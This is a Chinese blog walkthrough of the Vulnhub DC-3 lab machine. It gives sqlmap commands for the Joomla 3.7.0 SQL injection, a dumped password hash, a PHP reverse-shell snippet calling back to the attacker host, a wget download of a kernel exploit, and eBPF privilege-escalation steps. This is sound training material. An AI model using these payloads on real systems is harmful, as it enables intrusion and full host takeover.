[Vulnhub] DC-3

最新推荐文章于 2024-01-08 21:32:29 发布
最新推荐文章于 2024-01-08 21:32:29 发布
阅读量568 收藏
点赞数 1
分类专栏: Vulnhub 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63231007/article/details/128770841
版权

下载链接:DC-3

DC-3需要 把IDE里面的改成IDE 0:0  不然无法打开

知识点:

  • Joomla cms 3.7.0 sql注入漏洞
  • cmseek工具探测cms指纹
  • john解密
  • proc_popen反弹shell
  • python -m http.server开启http服务 & wget远程下载
  • ubuntu16.0.4 + Linux 4.4.0-21 系统漏洞提权

目录

信息搜集

sqlmap跑出用户信息

反弹shell

Privilege Escalation(提权)

信息搜集

nmap -sP 192.168.236.0/24 扫描一下靶机ip

靶机ip: 192.168.236.133

nmap -A -p 1-65535 192.168.236.133  扫描一下靶机开放哪些服务

通过扫描可以发现 DC-3开启了80端口 并且使用了Joomla! cms

访问一下看看:

 告诉我们这次只有一个flag且没有线索,需要称为root用户 

 dirb扫描一下目录 发现了administrator后台目录

目标网页CMS为 Joomla,使用专门扫它的工具joomscan 来扫描joomla
kali里面安装joomscan工具的命令是sudo apt-get install joomscan

joomscan --url http://192.168.236.133

也可以shi'y

也可以用github上的cmseek工具

GitHub - Tuhinshubhra/CMSeeK: CMS Detection and Exploitation suite - Scan WordPress, Joomla, Drupal and over 180 other CMSs

 扫出来CMS为 Joomla 3.7.0版本。使用kali里searchsploit 看看有没有可利用漏洞

sqlmap跑出用户信息

 看到了一个SQL注入漏洞,我们去看一下42033.txt内容

看见了 sqlmap的利用  我们用其构造好的,去sqlmap里跑一下:

sqlmap -u "http://192.168.236.133/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

得到数据库名,我们再次查询一下 joomladb数据库的表名:

sqlmap -u "http://192.168.236.133/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -p list[fullordering]

 

 查看users表里的各个字段:

sqlmap -u "http://192.168.236.133/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T "#__users" --columns -p list[fullordering]

 获得表中的账号密码  一般为username,password

sqlmap -u "http://192.168.236.133/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T "#__users" -C "username,password" --dump -p list[fullordering]

 获得账号密码

+----------+--------------------------------------------------------------+
| username | password                                                     |
+----------+--------------------------------------------------------------+
| admin    | $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu |
+----------+--------------------------------------------------------------+

 这是一个MD5+salt的加密,我们使用john去破解一下

得到密码 snoopy

反弹shell

访问之前扫到的后台地址 /administrator

 通过对后台的各种查询,发现Extensions->Templates里面的模板可以执行PHP脚本

 

可以创建一个php文件,也可以直接写入。再根据joomla的特性,模块会单独放在一个文件夹里/templates/,而protostar模块就在/templates/protostar/里面

当系统没有禁用proc_popen的时候,我们是可以借助proc_popen轻松反弹这样的一个shell的。
$sock = fsockopen("192.168.236.128", "4444");

$descriptorspec = array(

        0 => $sock,

        1 => $sock,

        2 => $sock

);

$process = proc_open('/bin/sh', $descriptorspec, $pipes);

proc_close($process);

kali里nc监听4444端口  得到反弹shell

python -c "import pty;pty.spawn('/bin/bash')" 获取一个交互式的shell

Privilege Escalation(提权)

SUID、git等等行不通,于是考虑系统漏洞提权

uname -a 查看内核版本  Linux DC-3 4.4.0-21

cat /etc/issue 查看一下系统版本  是Ubuntu 16.04

 查看kali本地漏洞库里面的exp

searchsploit Ubuntu 16.04

Privilege Escalation(提权),这里我们使用通用4.4.x版本的提权方式,locate定位完整path 

 cat /usr/share/exploitdb/exploits/linux/local/39772.txt 查看一下

文本写的是漏洞产生的原因、描述和漏洞利用的方法,还附上了exp,就是最后一行的链接:

注:github上说repo 也就是仓库已经迁移了,所以我们去这里下载:

bin-sploits/39772.zip · main · Exploit-DB / Binary Exploits · GitLab

 下载到本机上之后,我们可以选择通过蚁剑链接DC-3靶机,上传到靶机里,也可以先上传到kali kali上 python开启一个服务,然后靶机通过wget下载下来:

python -m http.server 1234

 回到DC-3靶机的shell里 使用wget下载下来

wget http://192.168.236.128:1234/39772.zip

 解压一下;

unzip 39772.zip            #解压39772.zip
cd 39772                #进入39772
tar -xvf exploit.tar    #解压缩exploit.tar

然后进入ebpf_mapfd_doubleput_exploit 目录下,按照kali里txt内容写的方法执行:

./compile.sh  执行compile.sh 执行完毕后会出现doubleput可执行文件
./doubleput    执行doubleput

得到 root权限  cd /root下,cat the-flag.txt 得到flag

 

葫芦娃42
关注
专栏目录
VulnHub DC-1
weixin_45682839的博客
04-13 354
VnlnHub DC-1靶场攻关攻略记录,五个flag,获得root权限。
vulnhub】---DC-6靶机
qq_43168364的博客
08-21 673
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机:靶机(192.168.15.154) 攻击机:kali Linux(192.168.15.129) 二、信息收集 主机发现 命令:nmap -sn 192.168.15.0/24 命令:netdiscover -i eth0 -r 192.168.15.0/24 端口扫描 版本探测和操作系统识别 web指纹识别 网站目录扫描 三、渗透测试 1、漏洞发现和利用 2、提权 四、总结 渗
VulnHub DC3
baynk的博客
05-16 294
0x00 靶机环境 下载地址1:https://www.vulnhub.com/entry/dc-32,312/ 下载地址2 dc-3.2:https://pan.baidu.com/s/1LyKZbgQiQsSqpMlY8kNUBw 提取码: z4pv 下载地址3 dc-3:https://pan.baidu.com/s/1lt3ek4ra2jHbR4HVEyrk7g 提取码: j8cg 只有一个flag了,同时也只有一个切入点,而且官网上DC3好像升到了DC3-2,不知道到和以前的区别大不大,我这里就
Vulnhub DC-3
Pai_Space
02-15 264
192.168.37.132 This time, there is only one flag, one entry point and no clues. To get the flag, you'll obviously have to gain root privileges. How you get to be root is up to you - and, obviously, the system. Good luck - and I hope you enjo...
VulnHubDC-3
qq_45434762的博客
03-23 511
一个粗糙的信息收集通过扫描端口信息,我们看到服务器只开放了一个80端口,运行的是Joomla框架我们打开网站看看在首页提示我们,这个靶机只有一个Flag,并且没有任何线索使用dirb扫...
vulnhub-DC3
weixin_55129870的博客
05-15 519
开机出现错误,解决方法。趁着更改网络连接方式为nat模式。 开启kali.探测主机存活 nmap -sP 192.168.44.0/24 DC3IP: 192.168.44.143 扫描主机开放服务 nmap -A 192.168.44.143 -p 1-65535 只开放80端口,直接浏览器访问 指纹识别 whatweb http://192.168.44.143/ 结果显示使用apache平台,...
Vulnhub DC-3靶场
weixin_47019868的博客
11-14 1032
Vulnhub DC-3靶场
vulnhub】---DC-4靶机
qq_43168364的博客
08-21 1954
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机:DC-4靶机(192.168.15.152) 攻击机:kali Linux(192.168.15.129) 二、信息收集 主机发现 端口扫描 版本探测和操作系统识别 web指纹识别 网站目录扫描 三、渗透测试 1、漏洞发现和利用 2、提权 四、总结 渗透步骤 渗透思路 ......
vulnhub】---DC-3靶机
qq_43168364的博客
08-22 683
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机:DC-3 靶机(192.168.15.151) 攻击机:kali Linux(192.168.15.129) 二、信息收集 主机发现 命令:namp -sn 102.168.15.0/24 或者用netdiscover, 命令: netdiscover -i eth0 -r 192.168.15.0/24 或者用, arp-scan -l 端口扫描 命令: masscan --ra
Vulnhub靶机 DC-3
菜浪马废的博客
03-20 406
扫描ip 找到靶机192.168.0.131 发现开放80端口 必须访问一下啊 这个样子的,没啥信息 上插件 wappalyzer 火狐的指纹信息插件 nmap也扫了一下 实锤了,Joomla的cms 那肯定要用配套的joomscan扫一下啊 没事就扫一扫,扫扫更健康 没安装,先装一下 apt-get install joomscan 安装命令 看见版本号了,3.7.0,还有后台...
vulnhubdc3
qq_54030686的博客
06-08 294
各位师傅可直接移步至 查看此篇即可,本人只当做笔记,以理清逻辑关系 主机发现 nmap -sS 192.168.2.0/24 发现测试靶机的ip为192.168.2.107,进行端口扫描 发现仅80端口开放进行指纹识别 发现网站使用的框架为joomla,使用专属的joomlascan进行检测, (中途更改了下环境,现在目标为192.168.43.131,本机ip为192.168.4.128) 打开相应界面 使用joomlascan进行检测 并未检测到相关漏洞,但检测到了后台路径和joomla 3.7版本,谷
vulnhub DC系列 DC-3
m0_64815693的博客
12-29 1850
vulnhub DC系列 DC-3
vulnhub靶场之DC-3
最新发布
qq_58091216的博客
01-08 1342
如果您的网站正在运行 Joomla,您可以对您的网站使用 JoomScan 实用程序来发现漏洞或仅提供有助于攻击您网站的一般信息。漏洞扫描器(JoomScan)是一个开源项目,其主要目的是实现漏洞检测的自动化,以增强Joomla CMS开发的安全性。与以前的 DC 版本一样,这个版本是为初学者设计的,尽管这一次只有一个标志,一个入口点,根本没有任何线索。Linux 技能和对 Linux 命令行的熟悉是必须的,对基本渗透测试工具的一些经验也是必须的。我们可以看到用户名爆破出来了,密码是加密的,我们进行解密。
vulnhub渗透测试靶机DC-3
weixin_46128614的博客
01-11 831
靶机下载:https://www.vulnhub.com/entry/dc-3,312/ nmap 扫描只有一个80端口 直接访问 没有过多提示 用dirb跑发现了后台登录页面 是一个joomld搭的开源站 没有验证码 尝试爆破管理员密码 bp发现是snoopy 进入后台 找到template页面 编辑一个php文件 提醒:此处用的是冰蝎shell。msf的shell无法连上,system(...
vulnhub靶机】DC-3
travelnight的博客
03-10 4850
原知识星球老文搬运 拿到靶机之后导入到virtualBOX里面。 1. nmap扫描主机存活,192.168.56.104 有个80端口,不放心的话可以用masscan。 2. 直接访问看下,这里提示只有一个flag,直接拿到root权限。 3. 习惯性的上一下dirbuster。发现访问到不存在的URL时候服务器也是返回200OK,这个扫描就没有什么参考价值了。 4.御剑扫描一下,发现后台页面。这个是joomlaCMS 5.参考了下知乎的这个joomla渗透,https
vulnhub靶机之dc-3
m0_52328368的博客
08-14 1328
dc-3靶机教程
vulnhub靶场,DC-3
kukudeshuo的博客
07-11 437
vulnhub靶场,DC-3 环境准备 靶机下载地址:https://www.vulnhub.com/entry/dc-32,312/ 攻击机:kali(192.168.58.130) 靶机:DC-3(192.168.58.146) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 确定目标靶机IP为192.168.58.146 使用nmap扫描查看目标靶机端口开放情况 可以看到目标靶机只开放
vulnhub靶机试炼场之DC-3
Mrs_H的博客
01-05 2464
DC-3靶机渗透实战 一.前言 关于这次的靶机渗透文章我已经托更很久了,一直都没有时间来好好看一下这个靶机。最近也是到了放假的时候,也会陆续的把之前期末复习期间欠下的东西好好回顾一下。在上个月里也没有好好的看过靶场里面的题目,这个月打算趁年前把ssrf的坑填了,顺便也想把文件上传这方面的靶场习题开个坑,以前只有在打比赛的时候才会着重看的漏洞就是文件上传,关于其中的奇技淫巧还有着太多不熟悉的地方,有时间要好好看一下了。 二.正文 这次的靶机只有一个flag所以这次就不以flag的先后顺序做时间线了,就以渗透的
DC-DC电路电感选择深度解析
"DC-DC电路中电感的选择关乎到开关电源设计的效率与稳定性。电感不仅是LC滤波电路的组成部分,其行为在开关电源的降压转换中扮演着关键角色。电感的选择需要考虑电感值、电流承受能力、绕线电阻以及机械尺寸等因素。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值